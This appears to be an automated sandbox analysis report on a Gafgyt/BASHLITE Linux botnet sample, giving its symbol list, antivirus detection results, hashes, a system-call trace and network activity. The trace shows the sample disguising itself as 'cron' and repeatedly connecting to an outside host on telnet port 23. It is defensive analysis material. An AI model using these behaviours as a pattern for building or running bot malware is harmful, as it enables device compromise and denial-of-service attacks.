__libc_fcntl, , atol, , _h_errno, , getRandomPublicIP, , getc_unlocked, , __ctype_b, , __GI_random_r, , usernames, , errno, , getegid, , read_until_response, , __GI_sbrk, , zprintf, , __GI___uClibc_init, , execve, , getpagesize, , getpid, , __GI_lseek64, , setstate_r, , fgets, , getHost, , __libc_getpid, , wildString, , __xpg_strerror_r, , fcntl64, , prctl, , memcpy, , makeRandomStr, , getRandomIP, , __GI_fputs_unlocked, , execl, , __GI_fgets, , sendHTTP, , creat, , _stdio_openlist_dec_use, , sclose, , __libc_select, , _ppfs_init, , __GI___C_ctype_toupper, , __GI_fgetc_unlocked, , __libc_nanosleep, , trim, , __GI_fgets_unlocked, , dup2, , __pthread_mutex_init, , tolower, , getuid, , system, , __open_etc_hosts, , udp, , malloc, , isatty, , sleep, , __GI_atol, , vsnprintf, , __dns_lookup, , __GI_read, , __C_ctype_tolower, , random_r, , __dso_handle, , clock_getres, , gethostbyname_r, , tcpcsum, , reset_telstate, , fdpclose, , socket, , __GI_dup2, , select, , _pthread_cleanup_pop_restore, , __GI_wcrtomb, , __GI___libc_fcntl, , __GI_memset, , isspace, , __stdio_seek, , mempcpy, , __GI_strcoll, , __GI_write, , __ctype_toupper, , __libc_read, , _string_syserrmsgs, , __GI_open, , __GI_strchr, , __searchdomain, , sigaddset, , __GI_tcgetattr, , __environ, , mmap, , wcsnrtombs, , makeIPPacket, , sockprintf, , __GI_inet_ntoa, , send, , __fgetc_unlocked, , abort, , __GI_fcntl, , __GI_wcsrtombs, , __GI_fwrite_unlocked, , __GI_getgid, , srandom_r, , _init, , __GI_inet_ntoa_r, , __GI_setstate_r, , parseHex, , strtol, , pipe, , __libc_lseek64, , strnlen, , rawmemchr, , __GI_mempcpy, , __malloc_state, , __GI___C_ctype_b_data, , __sigaddset, , nanosleep, , __GI_send, , h_errno, , __pthread_mutex_unlock, , wait4, , __register_frame_info_bases, , __GI_exit, , __app_fini, , csum, , __exit_cleanup, , __GI_execl, , __GI_srandom_r, , __GI___ctype_tolower, , write, , environ, , __GI_close, , __resolv_lock, , kill, , fputs_unlocked, , __pthread_mutex_trylock, , __GI_brk, , __GI_nanosleep, , __GI_strtok, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , ntohl, , __GI_fseek, , ourIP, , chdir, , fseeko, , _stdio_openlist_del_count, , connectTimeout, , __raise, , setsockopt, , bsd_signal, , fseek, , __GI_kill, , __GI_strcmp, , __GI_memmove, , sendSTD, , setstate, , __decode_dotted, , __stdio_READ, , memchr, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , tmpdirs, , __stdin, , stdin, , __GI_isatty, , strcasestr, , _start, , __deregister_frame_info_bases, , strstr, , __GI_ioctl, , init_rand, , rand, , signal, , read, , __decode_header, , __GI___h_errno_location, , __GI_memcpy, , strcoll, , tcp, , wcsrtombs, , _stdio_user_locking, , strncpy, , strcasecmp, , htonl, , sendto, , RemoveTMP, , __C_ctype_toupper, , __GI___C_ctype_b, , __GI_gethostbyname_r, , __GI_strncpy, , __libc_send, , __GI___xpg_strerror_r, , currentServer, , __GI___C_ctype_tolower, , __GI_getrlimit, , bcopy, , __GI_strcpy, , __GI_inet_ntop, , strtok, , __stdio_adjust_position, , malloc_trim, , __GI_poll, , _vfprintf_internal, , __GI_strcasestr, , fork, , __stdio_rfill, , strncat, , gotIP, , __GI_sleep, , sigaction, , __GI_gethostbyname, , _dl_phdr, , __GI_getc_unlocked, , __GI___libc_fcntl64, , __uClibc_init, , __GI_munmap, , _store_inttype, , __length_dotted, , __getpagesize, , __GI_random, , ssh, , __syscall_error, , __uclibc_progname, , __GI_getegid, , __GI_wait4, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_fork, , strdup, , __libc_close, , __GI_getpid, , inet_aton, , _pthread_cleanup_push_defer, , index, , processCmd, , __sigismember, , fopen, , __bss_start, , __libc_open, , getOurIP, , get_telstate_host, , memset, , __GI_socket, , main, , __glibc_strerror_r, , listFork, , __GI___C_ctype_tolower_data, , __stdio_fwrite, , negotiate, , srand, , initstate, , fclose, , __syscall_rt_sigaction, , ntohs, , inet_ntoa, , getppid, , tcgetattr, , __C_ctype_tolower_data, , time, , __libc_system, , __GI_abort, , poll, , fdpopen, , __get_hosts_byname_r, , __stdio_init_mutex, , __GI__exit, , botkiller, , strcmp, , advances2, , __nameserver, , data_start, , __GI_sysconf, , __h_errno_location, , matchPrompt, , __C_ctype_b_data, , __GI_inet_pton, , gethostbyname, , _stdio_fopen, , advance_state, , _fini, , __GI_chdir, , __vfork, , __GI_mmap, , contains_success, , sprintf, , fdgets, , __get_pc_thunk_bx, , strerror_r, , __GI_select, , __libc_waitpid, , socket_connect, , __GI_waitpid, , _stdio_term, , __decode_answer, , __GI_signal, , stderr, , fails, , commServer, , vfork, , __C_ctype_b, , srandom, , _ppfs_setargs, , __GI_sendto, , __GI_sigemptyset, , __libc_fork, , __atexit_lock, , scanPid, , rand_cmwc, , advances, , __libc_fcntl64, , getsockopt, , __GI_fseeko64, , fflush_unlocked, , __stdio_wcommit, , contains_string, , __GI___fgetc_unlocked, , __nameservers, , fwrite_unlocked, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lock, , __GI_getdtablesize, , contains_response, , _edata, , __stdout, , __GI_memrchr, , __GI_fflush_unlocked, , __GI_strstr, , __searchdomains, , _end, , htons, , _sigintr, , _ppfs_prepargs, , __GI_strspn, , fgetc_unlocked, , initstate_r, , __GI_connect, , __curbrk, , __libc_poll, , _dl_phnum, , _fpmaxtostr, , __errno_location, , uppercase, , _stdlib_strto_l, , __GI___libc_open, , exit, , __stdio_WRITE, , _stdio_init, , __GI_geteuid, , inet_ntop, , brk, , __C_ctype_toupper_data, , _dl_aux_init, , _errno, , atoi, , successes, , _stdio_openlist_del_lock, , __GI_inet_aton, , fgets_unlocked, , _exit, , szprintf, , strspn, , __libc_recv, , __libc_creat, , strlen, , lseek64, , open, , toupper, , __libc_write, , __malloc_consolidate, , _ppfs_parsespec, , __GI_strtol, , __GI_getuid, , __GI_strtok_r, , __GI_errno, , __libc_sendto, , __stdio_trans2w_o, , __GI_vfork, , strchr, , __GI_rawmemchr, , __GI_raise, , __data_start, , tel, , setsid, , __GI_inet_addr, , __encode_dotted, , __GI_strnlen, , _Jv_RegisterClasses, , macAddress, , __GI___errno_location, , readUntil, , fcntl, , read_with_timeout, , __GI_atoi, , fseeko64, , __GI_sprintf, , __ctype_tolower, , wcrtomb, , __GI_getsockname, , close, , __libc_connect, , passwords, , __GI_strlen, , mainCommSock, , pids, , strpbrk, , _load_inttype, , raise, , useragents, , free, , sigprocmask, , getsockname,
Present
True check_circle
Anti-Debug
Ptrace
False cancel
Anti-disasm
False cancel
Entry Point
Address
0x8048168
Suspicious
False cancel
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
74108
AVclass
gafgyt
1
VirusTotal
md5
c139cec1081a50867d295ef95daf4098
sha1
ed415cd3293827e3f634ba8f332c95b1c320ec3e
SCANS (DETECTION RATE = 69.49%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20200609
version: 18.4.3895.0
detected: True check_circle

MAX
result: malware (ai score=100)
update: 20200609
version: 2019.9.16.1
detected: True check_circle

Bkav
update: 20200609
version: 1.3.0.9899
detected: False cancel

K7GW
update: 20200609
version: 11.114.34346
detected: False cancel

ALYac
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20200609
version: 1.1.1.5
detected: True check_circle

Avast
result: ELF:DDoS-Y [Trj]
update: 20200609
version: 18.4.3895.0
detected: True check_circle

Avira
result: LINUX/Gafgyt.iqwaf
update: 20200609
version: 8.3.3.8
detected: True check_circle

Baidu
update: 20190318
version: 1.0.0.2
detected: False cancel

Cyren
result: ELF/Gafgyt.C.gen!Camelot
update: 20200609
version: 6.3.0.2
detected: True check_circle

DrWeb
result: Linux.BackDoor.Fgt.206
update: 20200608
version: 7.0.46.3050
detected: True check_circle

GData
result: Linux.Trojan-DDoS.Lightaidra.A
update: 20200609
version: A:25.25872B:27.19027
detected: True check_circle

Panda
update: 20200608
version: 4.6.4.2
detected: False cancel

VBA32
update: 20200608
version: 4.4.1
detected: False cancel

VIPRE
update: 20200609
version: 84336
detected: False cancel

Zoner
update: 20200609
version: 0.0.0.0
detected: False cancel

ClamAV
result: Unix.Trojan.Mirai-5607483-0
update: 20200608
version: 0.102.3.0
detected: True check_circle

Comodo
update: 20200609
version: 32518
detected: False cancel

F-Prot
update: 20200609
version: 4.7.1.166
detected: False cancel

Ikarus
result: Trojan.Linux.Gafgyt
update: 20200608
version: 0.1.5.2
detected: True check_circle

McAfee
result: RDN/Generic BackDoor.un
update: 20200609
version: 6.0.6.653
detected: True check_circle

Rising
result: Backdoor.Gafgyt!8.56E (TFE:14:SRT60T0wHHI)
update: 20200609
version: 25.0.0.25
detected: True check_circle

Sophos
result: Linux/DDoS-BI
update: 20200609
version: 4.98.0
detected: True check_circle

Yandex
update: 20200608
version: 5.5.2.24
detected: False cancel

Zillya
result: Backdoor.Gafgyt.Linux.12303
update: 20200606
version: 2.0.0.4105
detected: True check_circle

Arcabit
result: Trojan.Backdoor.Linux.Gafgyt.1
update: 20200609
version: 1.0.0.875
detected: True check_circle

FireEye
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20200609
version: 32.31.0.0
detected: True check_circle

Sangfor
result: Malware
update: 20200423
version: 1.0
detected: True check_circle

TACHYON
update: 20200609
version: 2020-06-09.02
detected: False cancel

Tencent
result: Trojan.Linux.Gafgyt.bbaa
update: 20200609
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20200609
version: 2014.3.20.0
detected: False cancel

Ad-Aware
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20200609
version: 3.0.5.370
detected: True check_circle

AegisLab
result: Trojan.Linux.Generic.m!c
update: 20200609
version: 4.2
detected: True check_circle

Emsisoft
result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B)
update: 20200605
version: 2018.12.0.1641
detected: True check_circle

F-Secure
result: Malware.LINUX/Gafgyt.iqwaf
update: 20200609
version: 12.0.86.52
detected: True check_circle

Fortinet
result: ELF/Gafgyt.BJ!tr
update: 20200609
version: 6.2.142.0
detected: True check_circle

Jiangmin
result: Backdoor.Linux.evz
update: 20200609
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20200609
version: 2013.8.14.323
detected: False cancel

Symantec
result: Trojan.Gen.NPE
update: 20200609
version: 1.11.0.0
detected: True check_circle

AhnLab-V3
result: Linux/Gafgyt.Gen14
update: 20200609
version: 3.17.6.27456
detected: True check_circle

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.az
update: 20200609
version: 3.0.0.1
detected: True check_circle

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.az
update: 20200609
version: 15.0.1.13
detected: True check_circle

Microsoft
result: DDoS:Linux/Lightaidra!rfn
update: 20200609
version: 1.1.17100.2
detected: True check_circle

Qihoo-360
result: Linux/Backdoor.e06
update: 20200609
version: 1.0.0.1120
detected: True check_circle

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.az
update: 20200609
version: 1.0
detected: True check_circle

ESET-NOD32
result: a variant of Linux/Gafgyt.QW
update: 20200609
version: 21462
detected: True check_circle

TrendMicro
result: Backdoor.Linux.BASHLITE.SMJC
update: 20200609
version: 11.0.0.1006
detected: True check_circle

BitDefender
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20200609
version: 7.2
detected: True check_circle

K7AntiVirus
update: 20200609
version: 11.114.34344
detected: False cancel

SentinelOne
result: DFI - Malicious ELF
update: 20200601
version: 4.3.0.105
detected: True check_circle

Avast-Mobile
result: ELF:DDoS-S [Trj]
update: 20200609
version: 200609-00
detected: True check_circle

Malwarebytes
update: 20200609
version: 3.6.4.335
detected: False cancel

TotalDefense
update: 20200601
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
update: 20200609
version: 14.00
detected: False cancel

NANO-Antivirus
result: Trojan.Elf32.Gafgyt.eqlxkn
update: 20200609
version: 1.0.134.25119
detected: True check_circle

BitDefenderTheta
result: Gen:NN.Mirai.34126
update: 20200603
version: 7.2.37796.0
detected: True check_circle

MicroWorld-eScan
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20200609
version: 14.0.409.0
detected: True check_circle

SUPERAntiSpyware
update: 20200606
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: RDN/Generic BackDoor.un
update: 20200609
version: v2017.3010
detected: True check_circle

TrendMicro-HouseCall
result: Backdoor.Linux.BASHLITE.SMJC
update: 20200609
version: 10.0.0.1040
detected: True check_circle

total
59
sha256
7dc750aa068b728dc3bc16a44c38f49073d5c675fd832afc3396f3a912a9e0b6
scan_id
7dc750aa068b728dc3bc16a44c38f49073d5c675fd832afc3396f3a912a9e0b6-1591686562
resource
c139cec1081a50867d295ef95daf4098
positives
41
scan_date
2020-06-09 07:09:22
verbose_msg
Scan finished, information embedded
response_code
1
Ltrace
Trace

Strace
Trace
4291execve"./malware"["./malware"][/* 15 vars */] 0
4291ioctl0TCGETS0xfffc0e90) = -1 ENOTTY (Inappropriate ioctl for device -1 ENOTTY (Inappropriate ioctl for device)
4291ioctl1TCGETS0xfffc0e90) = -1 ENOTTY (Inappropriate ioctl for device -1 ENOTTY (Inappropriate ioctl for device)
4291prctlPR_SET_NAME"cron\0PING\0DUP\0 \0" 0
4291timeNULL 1571351692
4291getpid 4291
4291timeNULL 1571351692
4291getpid 4291
4291socketPF_INETSOCK_DGRAMIPPROTO_IP 3
4291connect3{sa_family=AF_INET, {sa_family=AF_INET, sin_port=htons(53), sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}sin_addr=inet_addr("8.8.8.8")}16 0
4291getsockname3{sa_family=AF_INET, {sa_family=AF_INET, sin_port=htons(54082), sin_port=htons(54082), sin_addr=inet_addr("192.168.122.147")}sin_addr=inet_addr("192.168.122.147")}[16] 0
4291open"/proc/net/route"O_RDONLY 4
4291read4"I"1 1
4291read4"f"1 1
4291read4"a"1 1
4291read4"c"1 1
4291read4"e"1 1
4291read4"\t"1 1
4291read4"D"1 1
4291read4"e"1 1
4291read4"s"1 1
4291read4"t"1 1
4291read4"i"1 1
4291read4"n"1 1
4291read4"a"1 1
4291read4"t"1 1
4291read4"i"1 1
4291read4"o"1 1
4291read4"n"1 1
4291read4"\t"1 1
4291read4"G"1 1
4291read4"a"1 1
4291read4"t"1 1
4291read4"e"1 1
4291read4"w"1 1
4291read4"a"1 1
4291read4"y"1 1
4291read4" "1 1
4291read4"\t"1 1
4291read4"F"1 1
4291read4"l"1 1
4291read4"a"1 1
4291read4"g"1 1
4291read4"s"1 1
4291read4"\t"1 1
4291read4"R"1 1
4291read4"e"1 1
4291read4"f"1 1
4291read4"C"1 1
4291read4"n"1 1
4291read4"t"1 1
4291read4"\t"1 1
4291read4"U"1 1
4291read4"s"1 1
4291read4"e"1 1
4291read4"\t"1 1
4291read4"M"1 1
4291read4"e"1 1
4291read4"t"1 1
4291read4"r"1 1
4291read4"i"1 1
4291read4"c"1 1
4291read4"\t"1 1
4291read4"M"1 1
4291read4"a"1 1
4291read4"s"1 1
4291read4"k"1 1
4291read4"\t"1 1
4291read4"\t"1 1
4291read4"M"1 1
4291read4"T"1 1
4291read4"U"1 1
4291read4"\t"1 1
4291read4"W"1 1
4291read4"i"1 1
4291read4"n"1 1
4291read4"d"1 1
4291read4"o"1 1
4291read4"w"1 1
4291read4"\t"1 1
4291read4"I"1 1
4291read4"R"1 1
4291read4"T"1 1
4291read4"T"1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4"\n"1 1
4291read4"e"1 1
4291read4"n"1 1
4291read4"s"1 1
4291read4"3"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"1"1 1
4291read4"7"1 1
4291read4"A"1 1
4291read4"A"1 1
4291read4"8"1 1
4291read4"C"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"3"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"1"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4"\n"1 1
4291close4 0
4291ioctl3SIOCGIFHWADDR{ifr_name="ens3", {ifr_name="ens3", ifr_hwaddr=52:54:00:94:44:aa}ifr_hwaddr=52:54:00:94:44:aa} 0
4291close3 0
4291fork 4292
4291wait442924291 wait4(4292,
4292fork 4293
4292exit0 ?
4291[{WIFEXITEDs) && WEXITSTATUS(s) == 0}]0NULL 4292
4291---4291 --- SIGCHLD {si_signo=SIGCHLDsi_code=CLD_EXITEDsi_pid=4292si_uid=1000si_status=0si_utime=0si_stime=0} --0} ---
4291exit0 ?
4293setsid 4293
4293chroot"/") = -1 EPERM (Operation not permitted -1 EPERM (Operation not permitted)
4293chdir"/" 0
4293rt_sigactionSIGPIPE{SIG_IGN, {SIG_IGN, [PIPE], [PIPE]SA_RESTORER|SA_RESTART0x805216f}{SIG_DFL, {SIG_DFL, [], []0}8 0
4293socketPF_INETSOCK_STREAMIPPROTO_IP 3
4293fcntl3F_GETFL) = 0x2 (flags O_RDWR 0x2 (flags O_RDWR)
4293fcntl3F_SETFLO_RDWR|O_NONBLOCK 0
4293connect3{sa_family=AF_INET, {sa_family=AF_INET, sin_port=htons(23), sin_port=htons(23), sin_addr=inet_addr("27.118.21.217")}sin_addr=inet_addr("27.118.21.217")}16) = -1 EINPROGRESS (Operation now in progress -1 EINPROGRESS (Operation now in progress)
4293_newselect4NULL[3]NULL 0 (Timeout)
4293rt_sigprocmaskSIG_BLOCK[CHLD][]8 0
4293rt_sigactionSIGCHLDNULL{SIG_DFL, {SIG_DFL, [], []0}8 0
4293rt_sigprocmaskSIG_SETMASK[]NULL8 0
4293nanosleep{5,{5, 1571351692}1571351692}0xfffbfe24 0
4293close3 0
4293socketPF_INETSOCK_STREAMIPPROTO_IP 3
4293fcntl3F_GETFL) = 0x2 (flags O_RDWR 0x2 (flags O_RDWR)
4293fcntl3F_SETFLO_RDWR|O_NONBLOCK 0
4293connect3{sa_family=AF_INET, {sa_family=AF_INET, sin_port=htons(23), sin_port=htons(23), sin_addr=inet_addr("27.118.21.217")}sin_addr=inet_addr("27.118.21.217")}16) = -1 EINPROGRESS (Operation now in progress -1 EINPROGRESS (Operation now in progress)
4293_newselect4NULL[3]NULL4293 _newselect(4, NULL, [3], NULL, {30, 8}

Analysis
Ltrace
Statically-compiled samples cannot be ltraced.

Reason
Timeout

Status
Success

Strace
Success

Results
True check_circle

DNS
Query

Response

TCP
Info
computer localhost:47040 arrow_forward 27.118.21.217:23
computer localhost:47038 arrow_forward 27.118.21.217:23

UDP
Info
computer localhost:5353 arrow_forward help_outline 224.0.0.251:5353

HTTP
Info

Summary
DNS
False cancel

TCP
True check_circle

UDP
True check_circle

HTTP
False cancel

Binary
RF
confidence: 100.00%
suspicious: True check_circle
MLP
confidence: 99.98%
suspicious: True check_circle
SVM
confidence: 98.80%
suspicious: True check_circle
Add to Collection
Download